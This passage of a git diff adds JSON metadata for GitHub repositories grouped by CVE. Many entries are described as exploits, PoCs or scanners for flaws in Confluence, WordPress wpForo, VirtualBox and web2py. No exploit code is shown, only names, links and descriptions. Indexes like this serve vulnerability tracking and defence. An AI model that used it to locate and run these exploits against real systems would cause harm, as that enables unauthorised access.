"updated_at": "2024-10-21T18:15:25Z", + "pushed_at": "2024-10-21T18:15:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22074.json b/2023/CVE-2023-22074.json new file mode 100644 index 0000000000..1052bed05d --- /dev/null +++ b/2023/CVE-2023-22074.json @@ -0,0 +1,33 @@ +[ + { + "id": 709883034, + "name": "CVE-2023-22074", + "full_name": "emad-almousa\/CVE-2023-22074", + "owner": { + "login": "emad-almousa", + "id": 48997609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48997609?v=4", + "html_url": "https:\/\/github.com\/emad-almousa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emad-almousa\/CVE-2023-22074", + "description": "CVE-2023-22074", + "fork": false, + "created_at": "2023-10-25T15:26:17Z", + "updated_at": "2023-10-25T15:26:17Z", + "pushed_at": "2023-10-25T15:27:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22098.json b/2023/CVE-2023-22098.json new file mode 100644 index 0000000000..6aa19ea5f6 --- /dev/null +++ b/2023/CVE-2023-22098.json @@ -0,0 +1,33 @@ +[ + { + "id": 870976805, + "name": "CVE-2023-22098", + "full_name": "Diego-AltF4\/CVE-2023-22098", + "owner": { + "login": "Diego-AltF4", + "id": 55554183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55554183?v=4", + "html_url": "https:\/\/github.com\/Diego-AltF4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diego-AltF4\/CVE-2023-22098", + "description": "Oracle VM VirtualBox 7.0.10 r158379 Escape", + "fork": false, + "created_at": "2024-10-11T02:53:14Z", + "updated_at": "2024-10-24T14:57:22Z", + "pushed_at": "2024-10-23T18:01:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2215.json b/2023/CVE-2023-2215.json new file mode 100644 index 0000000000..9b0072901b --- /dev/null +++ b/2023/CVE-2023-2215.json @@ -0,0 +1,33 @@ +[ + { + "id": 703479135, + "name": "CVE-2023-2215", + "full_name": "zwxxb\/CVE-2023-2215", + "owner": { + "login": "zwxxb", + "id": 68430832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430832?v=4", + "html_url": "https:\/\/github.com\/zwxxb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwxxb\/CVE-2023-2215", + "description": "PoC For CVE-2023-2215 - Auth bypass ", + "fork": false, + "created_at": "2023-10-11T10:16:39Z", + "updated_at": "2023-10-12T11:03:42Z", + "pushed_at": "2023-10-12T14:08:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22432.json b/2023/CVE-2023-22432.json new file mode 100644 index 0000000000..d2d8a431e5 --- /dev/null +++ b/2023/CVE-2023-22432.json @@ -0,0 +1,33 @@ +[ + { + "id": 610098108, + "name": "CVE-2023-22432", + "full_name": "aeyesec\/CVE-2023-22432", + "owner": { + "login": "aeyesec", + "id": 61375985, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4", + "html_url": "https:\/\/github.com\/aeyesec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aeyesec\/CVE-2023-22432", + "description": "PoC for CVE-2023-22432 (web2py)", + "fork": false, + "created_at": "2023-03-06T04:43:11Z", + "updated_at": "2023-06-29T15:41:43Z", + "pushed_at": "2023-03-10T07:34:34Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-2249.json b/2023/CVE-2023-2249.json new file mode 100644 index 0000000000..a86a7a876b --- /dev/null +++ b/2023/CVE-2023-2249.json @@ -0,0 +1,41 @@ +[ + { + "id": 653268342, + "name": "CVE-2023-2249", + "full_name": "ixiacom\/CVE-2023-2249", + "owner": { + "login": "ixiacom", + "id": 17768184, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17768184?v=4", + "html_url": "https:\/\/github.com\/ixiacom", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ixiacom\/CVE-2023-2249", + "description": "Exploit for CVE-2023-2249 in wpForo Forum plugin for WordPress", + "fork": false, + "created_at": "2023-06-13T18:13:27Z", + "updated_at": "2024-11-05T06:59:31Z", + "pushed_at": "2023-07-05T14:11:46Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-2249", + "exploit", + "php", + "proof-of-concept", + "vulnerability", + "wordpress-plugin", + "wpforo" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22490.json b/2023/CVE-2023-22490.json new file mode 100644 index 0000000000..300c8921a0 --- /dev/null +++ b/2023/CVE-2023-22490.json @@ -0,0 +1,33 @@ +[ + { + "id": 608257297, + "name": "CVE-2023-22490_PoC", + "full_name": "smash8tap\/CVE-2023-22490_PoC", + "owner": { + "login": "smash8tap", + "id": 67650789, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67650789?v=4", + "html_url": "https:\/\/github.com\/smash8tap", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/smash8tap\/CVE-2023-22490_PoC", + "description": null, + "fork": false, + "created_at": "2023-03-01T16:37:39Z", + "updated_at": "2023-03-01T16:38:03Z", + "pushed_at": "2023-03-01T17:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22515.json b/2023/CVE-2023-22515.json new file mode 100644 index 0000000000..34f5046ecb --- /dev/null +++ b/2023/CVE-2023-22515.json @@ -0,0 +1,818 @@ +[ + { + "id": 701522727, + "name": "CVE-2023-22515-Scan", + "full_name": "ErikWynter\/CVE-2023-22515-Scan", + "owner": { + "login": "ErikWynter", + "id": 55885619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55885619?v=4", + "html_url": "https:\/\/github.com\/ErikWynter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ErikWynter\/CVE-2023-22515-Scan", + "description": "Scanner for CVE-2023-22515 - Broken Access Control Vulnerability in Atlassian Confluence", + "fork": false, + "created_at": "2023-10-06T20:29:44Z", + "updated_at": "2024-10-21T10:39:01Z", + "pushed_at": "2023-10-06T21:59:30Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 75, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703182036, + "name": "CVE-2023-22515-POC", + "full_name": "j3seer\/CVE-2023-22515-POC", + "owner": { + "login": "j3seer", + "id": 58823465, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58823465?v=4", + "html_url": "https:\/\/github.com\/j3seer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j3seer\/CVE-2023-22515-POC", + "description": "Poc for CVE-2023-22515", + "fork": false, + "created_at": "2023-10-10T18:45:10Z", + "updated_at": "2023-11-18T17:19:24Z", + "pushed_at": "2023-10-10T19:59:25Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703240587, + "name": "CVE-2023-22515", + "full_name": "Chocapikk\/CVE-2023-22515", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-22515", + "description": "CVE-2023-22515: Confluence Broken Access Control Exploit", + "fork": false, + "created_at": "2023-10-10T21:40:09Z", + "updated_at": "2025-01-05T04:54:11Z", + "pushed_at": "2023-10-17T22:04:13Z", + "stargazers_count": 131, + "watchers_count": 131, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "broken-access-control", + "confluence", + "cve-2023-22515", + "exploit", + "infosec", + "privilege-escalation", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 29, + "watchers": 131, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 703437161, + "name": "CVE-2023-22515", + "full_name": "ad-calcium\/CVE-2023-22515", + "owner": { + "login": "ad-calcium", + "id": 33044636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33044636?v=4", + "html_url": "https:\/\/github.com\/ad-calcium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ad-calcium\/CVE-2023-22515", + "description": "Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具", + "fork": false, + "created_at": "2023-10-11T08:42:17Z", + "updated_at": "2025-01-03T19:18:38Z", + "pushed_at": "2023-10-16T02:24:02Z", + "stargazers_count": 107, + "watchers_count": 107, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 107, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 703506378, + "name": "CVE-2023-22515", + "full_name": "kh4sh3i\/CVE-2023-22515", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2023-22515", + "description": "CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server", + "fork": false, + "created_at": "2023-10-11T11:21:47Z", + "updated_at": "2024-05-26T08:27:32Z", + "pushed_at": "2024-05-26T08:27:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "confluence", + "confluent-platform", + "cve", + "exploit", + "exploitation", + "jira", + "rce", + "scanner", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 703835604, + "name": "CVE-2023-22515", + "full_name": "sincere9\/CVE-2023-22515", + "owner": { + "login": "sincere9", + "id": 128219249, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128219249?v=4", + "html_url": "https:\/\/github.com\/sincere9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sincere9\/CVE-2023-22515", + "description": "Confluence未授权添加管理员用户漏洞利用脚本", + "fork": false, + "created_at": "2023-10-12T02:41:23Z", + "updated_at": "2024-11-10T12:36:03Z", + "pushed_at": "2023-10-26T07:39:57Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704360942, + "name": "CVE-2023-22515", + "full_name": "Le1a\/CVE-2023-22515", + "owner": { + "login": "Le1a", + "id": 97610822, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97610822?v=4", + "html_url": "https:\/\/github.com\/Le1a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Le1a\/CVE-2023-22515", + "description": "Confluence Data Center & Server 权限提升漏洞 Exploit", + "fork": false, + "created_at": "2023-10-13T05:18:54Z", + "updated_at": "2023-10-16T05:58:42Z", + "pushed_at": "2023-10-13T05:21:37Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704422927, + "name": "confluence-cve-2023-22515", + "full_name": "Vulnmachines\/confluence-cve-2023-22515", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/confluence-cve-2023-22515", + "description": "Confluence Broken Access Control", + "fork": false, + "created_at": "2023-10-13T08:19:07Z", + "updated_at": "2023-10-14T09:17:41Z", + "pushed_at": "2023-10-13T08:23:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704429158, + "name": "CVE-2023-22515", + "full_name": "iveresk\/CVE-2023-22515", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/CVE-2023-22515", + "description": "iveresk-CVE-2023-22515", + "fork": false, + "created_at": "2023-10-13T08:36:21Z", + "updated_at": "2023-10-17T06:31:16Z", + "pushed_at": "2023-10-13T15:43:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707587880, + "name": "CVE-2023-22515_RCE", + "full_name": "youcannotseemeagain\/CVE-2023-22515_RCE", + "owner": { + "login": "youcannotseemeagain", + "id": 48853857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48853857?v=4", + "html_url": "https:\/\/github.com\/youcannotseemeagain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/youcannotseemeagain\/CVE-2023-22515_RCE", + "description": "Confluence后台rce", + "fork": false, + "created_at": "2023-10-20T08:23:47Z", + "updated_at": "2024-11-15T06:57:50Z", + "pushed_at": "2023-10-20T08:25:02Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708092317, + "name": "cve-2023-22515-exp", + "full_name": "DsaHen\/cve-2023-22515-exp", + "owner": { + "login": "DsaHen", + "id": 83688624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83688624?v=4", + "html_url": "https:\/\/github.com\/DsaHen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DsaHen\/cve-2023-22515-exp", + "description": "cve-2023-22515的python利用脚本", + "fork": false, + "created_at": "2023-10-21T13:59:16Z", + "updated_at": "2023-10-21T15:54:08Z", + "pushed_at": "2023-10-21T14:07:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708570186, + "name": "CVE-2023-22515", + "full_name": "joaoviictorti\/CVE-2023-22515", + "owner": { + "login": "joaoviictorti", + "id": 85838827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85838827?v=4", + "html_url": "https:\/\/github.com\/joaoviictorti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joaoviictorti\/CVE-2023-22515", + "description": "CVE-2023-22515 (Confluence Broken Access Control Exploit)", + "fork": false, + "created_at": "2023-10-22T23:37:56Z", + "updated_at": "2023-12-07T18:07:29Z", + "pushed_at": "2023-11-22T21:44:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 710666806, + "name": "CVE-2023-22515", + "full_name": "C1ph3rX13\/CVE-2023-22515", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22515", + "description": "CVE-2023-22515", + "fork": false, + "created_at": "2023-10-27T07:20:35Z", + "updated_at": "2024-01-14T12:52:24Z", + "pushed_at": "2023-12-12T03:02:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711670398, + "name": "confluence-hack", + "full_name": "AIex-3\/confluence-hack", + "owner": { + "login": "AIex-3", + "id": 76010792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76010792?v=4", + "html_url": "https:\/\/github.com\/AIex-3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AIex-3\/confluence-hack", + "description": "CVE-2023-22515", + "fork": false, + "created_at": "2023-10-30T00:17:45Z", + "updated_at": "2024-11-29T04:13:32Z", + "pushed_at": "2023-11-10T17:43:40Z", + "stargazers_count": 50, + "watchers_count": 50, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "broken-access-control", + "confluence", + "cve-2023-22515", + "cybersecurity", + "exploit", + "privilege-escalation", + "remote-code-execution", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 50, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715922032, + "name": "CVE-2023-22515", + "full_name": "LucasPDiniz\/CVE-2023-22515", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2023-22515", + "description": "Server Broken Access Control in Confluence - CVE-2023-22515", + "fork": false, + "created_at": "2023-11-08T05:18:30Z", + "updated_at": "2024-06-30T22:00:53Z", + "pushed_at": "2024-06-30T22:00:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve", + "cve-2023-22515", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716585912, + "name": "Confluence-EvilJar", + "full_name": "aaaademo\/Confluence-EvilJar", + "owner": { + "login": "aaaademo", + "id": 147170429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147170429?v=4", + "html_url": "https:\/\/github.com\/aaaademo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaaademo\/Confluence-EvilJar", + "description": "配合 CVE-2023-22515 后台上传jar包实现RCE", + "fork": false, + "created_at": "2023-11-09T12:55:25Z", + "updated_at": "2024-11-29T04:13:31Z", + "pushed_at": "2023-11-09T14:21:58Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723825331, + "name": "CVE-2023-22515-Scan.", + "full_name": "edsonjt81\/CVE-2023-22515-Scan.", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2023-22515-Scan.", + "description": null, + "fork": false, + "created_at": "2023-11-26T21:24:55Z", + "updated_at": "2023-11-26T21:25:08Z", + "pushed_at": "2024-05-21T04:09:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724883216, + "name": "cve-2023-22515", + "full_name": "INTfinityConsulting\/cve-2023-22515", + "owner": { + "login": "INTfinityConsulting", + "id": 104363833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104363833?v=4", + "html_url": "https:\/\/github.com\/INTfinityConsulting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/INTfinityConsulting\/cve-2023-22515", + "description": "Confluence broken access control to code execution", + "fork": false, + "created_at": "2023-11-29T01:34:35Z", + "updated_at": "2023-11-29T01:37:35Z", + "pushed_at": "2023-11-30T00:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 738213429, + "name": "Exploit-CVE-2023-22515", + "full_name": "CalegariMindSec\/Exploit-CVE-2023-22515", + "owner": { + "login": "CalegariMindSec", + "id": 68512056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68512056?v=4", + "html_url": "https:\/\/github.com\/CalegariMindSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CalegariMindSec\/Exploit-CVE-2023-22515", + "description": "A simple exploit for CVE-2023-22515", + "fork": false, + "created_at": "2024-01-02T17:40:24Z", + "updated_at": "2024-01-02T23:11:04Z", + "pushed_at": "2024-01-02T23:15:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762759550, + "name": "CVE-2023-22515", + "full_name": "rxerium\/CVE-2023-22515", + "owner": { + "login": "rxerium", + "id": 59293085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4", + "html_url": "https:\/\/github.com\/rxerium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxerium\/CVE-2023-22515", + "description": "Atlassian Confluence Data Center and Server Broken Access Control Vulnerability", + "fork": false, + "created_at": "2024-02-24T16:04:35Z", + "updated_at": "2024-10-05T06:16:42Z", + "pushed_at": "2024-10-05T06:16:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "atlassian", + "atlassian-confluence", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792458695, + "name": "NSE--CVE-2023-22515", + "full_name": "fyx1t\/NSE--CVE-2023-22515", + "owner": { + "login": "fyx1t", + "id": 57405939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57405939?v=4", + "html_url": "https:\/\/github.com\/fyx1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fyx1t\/NSE--CVE-2023-22515", + "description": "NSE script for checking the presence of CVE-2023-22515", + "fork": false, + "created_at": "2024-04-26T17:57:33Z", + "updated_at": "2024-11-15T21:14:17Z", + "pushed_at": "2024-04-26T17:58:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811026888, + "name": "CVE-2023-22515-check", + "full_name": "s1d6point7bugcrowd\/CVE-2023-22515-check", + "owner": { + "login": "s1d6point7bugcrowd", + "id": 163605035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163605035?v=4", + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd\/CVE-2023-22515-check", + "description": "This script will inform the user if the Confluence instance is vulnerable, but it will not proceed with the exploitation steps.", + "fork": false, + "created_at": "2024-06-05T19:56:16Z", + "updated_at": "2024-06-20T19:03:26Z", + "pushed_at": "2024-06-20T19:03:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812408801, + "name": "cve-2023-22515", + "full_name": "xorbbo\/cve-2023-22515", + "owner": { + "login": "xorbbo", + "id": 172144274, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172144274?v=4", + "html_url": "https:\/\/github.com\/xorbbo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xorbbo\/cve-2023-22515", + "description": "NSE script to check if app is vulnerable to cve-2023-22515", + "fork": false, + "created_at": "2024-06-08T20:04:44Z", + "updated_at": "2024-06-08T20:10:35Z", + "pushed_at": "2024-06-08T20:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830699904, + "name": "CVE-2023-22515-NSE", + "full_name": "spareack\/CVE-2023-22515-NSE", + "owner": { + "login": "spareack", + "id": 92234381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92234381?v=4", + "html_url": "https:\/\/github.com\/spareack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spareack\/CVE-2023-22515-NSE", + "description": "Vulnerability checking tool via Nmap Scripting Engine", + "fork": false, + "created_at": "2024-07-18T19:55:59Z", + "updated_at": "2024-12-02T17:57:36Z", + "pushed_at": "2024-11-19T23:11:14Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831810309, + "name": "CVE-2023-22515-Confluence", + "full_name": "Onedy1703\/CVE-2023-22515-Confluence", + "owner": { + "login": "Onedy1703", + "id": 74649794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74649794?v=4", + "html_url": "https:\/\/github.com\/Onedy1703", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Onedy1703\/CVE-2023-22515-Confluence", + "description": "CVE 2023-22515", + "fork": false, + "created_at": "2024-07-21T17:19:36Z", + "updated_at": "2024-12-16T10:14:30Z", + "pushed_at": "2024-12-16T10:13:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22518.json b/2023/CVE-2023-22518.json new file mode 100644 index 0000000000..719194f0a2 --- /dev/null +++ b/2023/CVE-2023-22518.json @@ -0,0 +1,241 @@ +[ + { + "id": 712257484, + "name": "CVE-2023-22518", + "full_name": "ForceFledgling\/CVE-2023-22518", + "owner": { + "login": "ForceFledgling", + "id": 92352077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92352077?v=4", + "html_url": "https:\/\/github.com\/ForceFledgling", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ForceFledgling\/CVE-2023-22518", + "description": "Improper Authorization Vulnerability in Confluence Data Center and Server + bonus 🔥", + "fork": false, + 